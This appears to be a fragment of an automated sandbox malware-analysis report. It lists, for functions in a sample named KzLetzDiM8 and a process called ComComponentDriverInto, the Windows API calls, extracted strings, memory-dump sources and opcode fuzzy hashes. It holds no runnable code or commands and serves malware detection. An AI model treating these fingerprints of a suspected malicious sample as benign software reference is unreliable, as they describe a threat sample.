                                                            • GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                            • SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: 23fa31ab071012065dd0cae2d176a224c585c4873194cbfb9310b10f096c2744
                                                            • Instruction ID: 715fc7b2270953ed8c9f296772d20a2d00eee0ce5bbd396ce042a3a9a1b31985
                                                            • Opcode Fuzzy Hash: 23fa31ab071012065dd0cae2d176a224c585c4873194cbfb9310b10f096c2744
                                                            • Instruction Fuzzy Hash: 46F0AF701046C8BADF154F629C0DBEE7B99BF15364F048214FD48549E1CB74CAA0EB10
                                                            APIs
                                                              • Part of subcall function 0020BF30: GetEnvironmentStringsW.KERNEL32 ref: 0020BF39
                                                              • Part of subcall function 0020BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020BF5C
                                                              • Part of subcall function 0020BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0020BF82
                                                              • Part of subcall function 0020BF30: _free.LIBCMT ref: 0020BF95
                                                              • Part of subcall function 0020BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0020BFA4
                                                            • _free.LIBCMT ref: 002082AE
                                                            • _free.LIBCMT ref: 002082B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID: 0"$
                                                            • API String ID: 400815659-1083940467
                                                            • Opcode ID: 2a29bc6fa2cb7eaa0cb726fad17524ea029ffa476c518b812c83b70083b94b3a
                                                            • Instruction ID: 579fa3cb926ca00819c068017a82efda6174fe66595d3f99e3b2607802c82d30
                                                            • Opcode Fuzzy Hash: 2a29bc6fa2cb7eaa0cb726fad17524ea029ffa476c518b812c83b70083b94b3a
                                                            • Instruction Fuzzy Hash: 53E0E523A36F9389E361763A2C4262B06004F81338B540316FE90870C3CED088360CA6
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,001F1101,?,?,001F117F,?,?,?,?,?,001F1169), ref: 001F0FEA
                                                            • GetLastError.KERNEL32(?,?,001F117F,?,?,?,?,?,001F1169), ref: 001F0FF6
                                                              • Part of subcall function 001E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 001F0FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: 3f2c46c138f6d4014fd666036168569ed1436f67a93645d9f3af19d6545e40e7
                                                            • Instruction ID: a2d4dc219d8382ad27d7dfcc394cfb308edfc5b1ae8457ef97693ceecd200ad3
                                                            • Opcode Fuzzy Hash: 3f2c46c138f6d4014fd666036168569ed1436f67a93645d9f3af19d6545e40e7
                                                            • Instruction Fuzzy Hash: FED02E32548970BAC6203324BC0ECBE3C458B32771BB04764F53C622E6CF200BA14292
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,001EDA55,?), ref: 001EE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,001EDA55,?), ref: 001EE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: fe8707daa779d1034a54f1a687e5ce5ca63a40c04489c037c56313eb55083d77
                                                            • Instruction ID: 36c0c51e7e7e390a1b11f0edfa4d3cc967ea76536871dbe5c03292c8e13c792e
                                                            • Opcode Fuzzy Hash: fe8707daa779d1034a54f1a687e5ce5ca63a40c04489c037c56313eb55083d77
                                                            • Instruction Fuzzy Hash: 3CC0123164075066EA3097657C0DBC76ED95B25B11F05049CB241F91D1DAA5C58086A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Z_H
                                                            • API String ID: 0-3267294416
                                                            • Opcode ID: ffbff3fbfc0efe27923fbb7c71c36d83eee67bc5c95313c036e59dca57e9791d
                                                            • Instruction ID: 440e7f59be28e99d807075de76698ee8aa844a4eaac7bb1c4f5e63001ebce884
                                                            • Opcode Fuzzy Hash: ffbff3fbfc0efe27923fbb7c71c36d83eee67bc5c95313c036e59dca57e9791d
                                                            • Instruction Fuzzy Hash: D5911772A19A9D4FE799DF688875BA87FE1FF5A314F4101BED059C72E2CAB81410CB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: d9fe6cbcf33e968fbe008b0ca0e2fc09c73ca3c706247472f6a2bf70f7aacf73
                                                            • Instruction ID: 5022affe0b1395490d07e95fa59a03006efff555bddcf7f26f50773bce295acd
                                                            • Opcode Fuzzy Hash: d9fe6cbcf33e968fbe008b0ca0e2fc09c73ca3c706247472f6a2bf70f7aacf73
                                                            • Instruction Fuzzy Hash: 23513A71E0A65E8FDB69CB98C4615BCB7B1FF44300F5141BAD01AE72E2DE362A05CB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 11c783a93f94e275b45d4b13287d08d040ee84a7392b3aa365759da3348d479e
                                                            • Instruction ID: 10514ec6a584399ab3f3c2961f133fae1ffbd4bf4b752d69358fdd8552b95460
                                                            • Opcode Fuzzy Hash: 11c783a93f94e275b45d4b13287d08d040ee84a7392b3aa365759da3348d479e
                                                            • Instruction Fuzzy Hash: D7515C31E0A65E8FDB59CB98C8715BDB7B1FF58300F1541BAD01AE72A6CA396A01CF40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: T_H
                                                            • API String ID: 0-685202563
                                                            • Opcode ID: 613ae411159b4ad344847b93976c4cc3d4ed046e546a7592a8bf3badf9b40a92
                                                            • Instruction ID: 62d5d2cc274410a6814bf2345feec7f7d129823df6ad7d9ad02d2de4fdf824c0
                                                            • Opcode Fuzzy Hash: 613ae411159b4ad344847b93976c4cc3d4ed046e546a7592a8bf3badf9b40a92
                                                            • Instruction Fuzzy Hash: 4E21F931E0991D9FDF98DB58C465AADB7B5FF68300F0141AE900EE72A1CE35AA41CF40
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37280205020ad5bb76a04d1bd16f342d5b9fec65391039230ad2121400d668d5
                                                            • Instruction ID: 56d1598f5d31eafab3bc8fc11ba74087c42ddb51e00c00b443aaeba80ff160a7
                                                            • Opcode Fuzzy Hash: 37280205020ad5bb76a04d1bd16f342d5b9fec65391039230ad2121400d668d5
                                                            • Instruction Fuzzy Hash: 1422D730B09A2D8FDBA9DB48C866A7973E5FF54311B1101BAD01EC72A6DE25ED45CF80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4246d5d89b295d61ed945d3d704635ca7adadea69b19501a51076cc758fe8be3
                                                            • Instruction ID: 123c90f5dbdbfd4f92c06bb192b0e02a85e6dc388aaf193d40ac4889c864ab22
                                                            • Opcode Fuzzy Hash: 4246d5d89b295d61ed945d3d704635ca7adadea69b19501a51076cc758fe8be3
                                                            • Instruction Fuzzy Hash: BC02E334A0EA6E8FE778DBA5D4A057977E5FF44300B11057EC04EC76A2DE2AB941CB81
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8dbdc2c6b8d34034d01292b7e129314c4d74b0f04cd4eb282d642057770e4b66
                                                            • Instruction ID: 5f512dc5b9230cf33da40392aa5e1a3ee8949bfea5c2058ee8cc28cb6bc6f2e3
                                                            • Opcode Fuzzy Hash: 8dbdc2c6b8d34034d01292b7e129314c4d74b0f04cd4eb282d642057770e4b66
                                                            • Instruction Fuzzy Hash: 05D11430A0EB6A8FD379CB69D4A0475B7E4FF45304B1505BEC08AC75A6DE2AF9428B41
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58d2b4bdd2f25a969bbf7763beeca547e6462c3deac326a6af1a56c14a871cde
                                                            • Instruction ID: c9d9727c41b3fdac90c4ce53878fcf9857a56a8989e4eb6b3cd879cd257ba2ac
                                                            • Opcode Fuzzy Hash: 58d2b4bdd2f25a969bbf7763beeca547e6462c3deac326a6af1a56c14a871cde
                                                            • Instruction Fuzzy Hash: 64C1D430A0EA5A4FE759DB99C0A06A4B7B5FF59300F4541BDC04ECBA96CB29F951CB80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6d0a9420624e7f3574bf1e87af3e46343ed3fb480c2ea116189c09313a1b777
                                                            • Instruction ID: 3e6e6c363e2549fd47945c941f32ec5dced05a0095326a948212034b42f107da
                                                            • Opcode Fuzzy Hash: b6d0a9420624e7f3574bf1e87af3e46343ed3fb480c2ea116189c09313a1b777
                                                            • Instruction Fuzzy Hash: 69C10530B0AA4A8FE759DF69C0A16B477A5FF08310F15417DD04EC7A96CB29B951CBC0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba375be859d6d663632337e47bfa8c9bee09aa54004961f50c35ec466b3cb39f
                                                            • Instruction ID: a13d4bb83b1706c3da285e1462c9fc672ecf98faf058436023b904943b099fe9
                                                            • Opcode Fuzzy Hash: ba375be859d6d663632337e47bfa8c9bee09aa54004961f50c35ec466b3cb39f
                                                            • Instruction Fuzzy Hash: 7DC11030B0AA5A8FE759DBA9C0A46B4B7A4FF18310F454179D04EC7AD6CB29B951CB80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a943822939800326a49ae76cdc8c1e03c485ac1da069391d090af763ff2aac8
                                                            • Instruction ID: 4c09b7a11409ef9d5e13323c4351c464167df4e7280bcf544a37f9a1dc54e5ad
                                                            • Opcode Fuzzy Hash: 1a943822939800326a49ae76cdc8c1e03c485ac1da069391d090af763ff2aac8
                                                            • Instruction Fuzzy Hash: F4210512F0F0BBCAF23892DA28B10BC56489F95321F0A0577D04E852F2DC4EBA555B82
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c336414640cf17697d84900b3da0dcd357d1531507dbb1913c0f092d77f45688
                                                            • Instruction ID: e74abf3c0ca2981a5d7348a85cb0a7550402c5a6fe6167cbd508306313fc4764
                                                            • Opcode Fuzzy Hash: c336414640cf17697d84900b3da0dcd357d1531507dbb1913c0f092d77f45688
                                                            • Instruction Fuzzy Hash: CE210412F0F2BB86F77465EA28710B816445F05735F1B06B6D45E8A8E3CC0E2A819B8A
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 168fab1279e4f1d608da9474c2b3ab0a18e28c891af446a3749cb3b92deff240
                                                            • Instruction ID: 474533f288de18a923a65080c61149cdd5b2402d25eaa9e3e25c73c70a049d36
                                                            • Opcode Fuzzy Hash: 168fab1279e4f1d608da9474c2b3ab0a18e28c891af446a3749cb3b92deff240
                                                            • Instruction Fuzzy Hash: 5421F652F0F17F86F63856E778311BD6F486F54320F1A0677D04E8A1E2DC4E26916B92
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff2217e283b425bf11ca934ffe5131437bfe2c47d54a480d6b6783787c80b4c7
                                                            • Instruction ID: 08cd91ba4f10355f6335d3f780cb4a10660c6ef183eb882fa80cd23abfb3f379
                                                            • Opcode Fuzzy Hash: ff2217e283b425bf11ca934ffe5131437bfe2c47d54a480d6b6783787c80b4c7
                                                            • Instruction Fuzzy Hash: 06B1C33061956A8FEB69CF48C0E05B437A5FF44310B5156BDC85ACB69BDA39F982CF80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04d3d4b7a4f3bf31ad104d3d341218a837c711e2135b2951d721802dc911176a
                                                            • Instruction ID: 1b47d1cb9ca881a17d4d101f73a5aafb02e52ed72b30d76a9c3240abbec36caf
                                                            • Opcode Fuzzy Hash: 04d3d4b7a4f3bf31ad104d3d341218a837c711e2135b2951d721802dc911176a
                                                            • Instruction Fuzzy Hash: C5B1E23061A66A8FEB59CF58C0F05B437A5FF45310B5506BDC85B8B69BC639E981CF80
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60fb0530b6fbede7306c66b6bb437193b70dd947833021fbdee9b5bd8070406e
                                                            • Instruction ID: 0d12d2a0c8a6d6ec091f3cf9716a8a5b55fe6a8cea34361146e050859795b671
                                                            • Opcode Fuzzy Hash: 60fb0530b6fbede7306c66b6bb437193b70dd947833021fbdee9b5bd8070406e
                                                            • Instruction Fuzzy Hash: EA817C31B0EB6A4FE3F85A69946117977E4FF45310B1509BFE08EC71A3CE2AB5068B41
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a0a0ca651c318891d745bf9f5d88705cb2f1a111343c78705b6b49e9f2218041
                                                            • Instruction ID: 4cdc3f7413400713500d32eabffabc440b2afd393bf382c0c7e35828a5c3bc88
                                                            • Opcode Fuzzy Hash: a0a0ca651c318891d745bf9f5d88705cb2f1a111343c78705b6b49e9f2218041
                                                            • Instruction Fuzzy Hash: 24916A31F0E75A4FE33D5A69946917977E4EF86310B16017EE08EC71E3CE2AB9028B41
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d87905e39b0fd68ae546f8f385653b928a8c7c65d9a580c6a61f9ecbae59780b
                                                            • Instruction ID: 5a50bd1a51eec2cb3663e9c1432d8af228dcdaf56e725e214e85c6abde9acaaf
                                                            • Opcode Fuzzy Hash: d87905e39b0fd68ae546f8f385653b928a8c7c65d9a580c6a61f9ecbae59780b
                                                            • Instruction Fuzzy Hash: BE11C412F0F5BF86F63951E7383517D5F446F55320F1A02BAD48D8A0E7DC4E2A816B92
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a2055d6a8d9ec42e8913a76da3d6b36ec564574c7e3a5890f5c0209044e70a7
                                                            • Instruction ID: 63461f2354bf20d1ebe4fcc74085246fbc0f98da77882f6a5a5492820d151174
                                                            • Opcode Fuzzy Hash: 8a2055d6a8d9ec42e8913a76da3d6b36ec564574c7e3a5890f5c0209044e70a7
                                                            • Instruction Fuzzy Hash: 8F817B32B0E61A4FE33C9A59946547977F4FF85311B16047ED48FC72A3CE2AB9428B42
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c787b26c6509c1f37f2f1b92bec94751a32fddd488df1750d33068b6e34e32b4
                                                            • Instruction ID: f0daf311aec06c90a5322f3aec7de01fbfa40f1da04fe36e6f833b89392b2705
                                                            • Opcode Fuzzy Hash: c787b26c6509c1f37f2f1b92bec94751a32fddd488df1750d33068b6e34e32b4
                                                            • Instruction Fuzzy Hash: 34110B12F0F0BBCAF339D29A28720FC55445F55321F1A05B7D04E8A2E3DC0EA6554B82
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60d4cf7411ef96ae2afadd4a11b15621295c7622862ea1ad359e497107bbbc0a
                                                            • Instruction ID: 9069e9c0a6d138803e2b1f58cb32c800c1709ad411fd03ebaaea5d7d7b6e8dbc
                                                            • Opcode Fuzzy Hash: 60d4cf7411ef96ae2afadd4a11b15621295c7622862ea1ad359e497107bbbc0a
                                                            • Instruction Fuzzy Hash: 49713C71B0E45E4FF778DA5988665B437C4FF44310B1602BAD09FC77B2DE19AA0A8B81
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f0f6984f5b31d537a528b7ec4baa9235d7529663579544d128069dda9c6d6744
                                                            • Instruction ID: 281c30a09c9a723de1ece97dbcaeb4838c6cb82fdea2b9944d5d24dedab6824e
                                                            • Opcode Fuzzy Hash: f0f6984f5b31d537a528b7ec4baa9235d7529663579544d128069dda9c6d6744
                                                            • Instruction Fuzzy Hash: EF711431A0E56D4FE778EA5A88265B537C4EF44710B0602B9D09EC35B3DA1ABE068BC1
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e42f1b96639464847ea6ac9170e65b84d9c41581b787573e1abf78cfb80b33e8
                                                            • Instruction ID: 17fa55e9af6053fe7b11dd62806330893201b4b1c105e0bc682371206391cb63
                                                            • Opcode Fuzzy Hash: e42f1b96639464847ea6ac9170e65b84d9c41581b787573e1abf78cfb80b33e8
                                                            • Instruction Fuzzy Hash: 01717E31B0E45E4FE77CDA59C8665B43BC4FF44312B0102B9D49EC7DB2DD1AAA068B85
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82c2791655489f47b791289effcc46ef7200b51b92d35c0f3715695bf65dabe8
                                                            • Instruction ID: c931e03a8e9a281a4f79ca1310486eb0c48749fc24539942bbdb101605952d98
                                                            • Opcode Fuzzy Hash: 82c2791655489f47b791289effcc46ef7200b51b92d35c0f3715695bf65dabe8
                                                            • Instruction Fuzzy Hash: C671AD31B0E45E4FE77CDAD9E8665B43BC4FF48310B010279D49EC79B2DE1AA9068B81
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 064f2eb6cbe16c3268ca0050dbf843a631ff8960b4724b2a1834eddcddc637fc
                                                            • Instruction ID: 416b321341e8f2e08827e9935c8e8d442709f6f1f00bbca19a59819a8d47feb1
                                                            • Opcode Fuzzy Hash: 064f2eb6cbe16c3268ca0050dbf843a631ff8960b4724b2a1834eddcddc637fc
                                                            • Instruction Fuzzy Hash: 6D81F330A0E56E8FEF2D8F58C4A45B57BA1FF41300F1545B9C44A8B59ADE38A946CB41
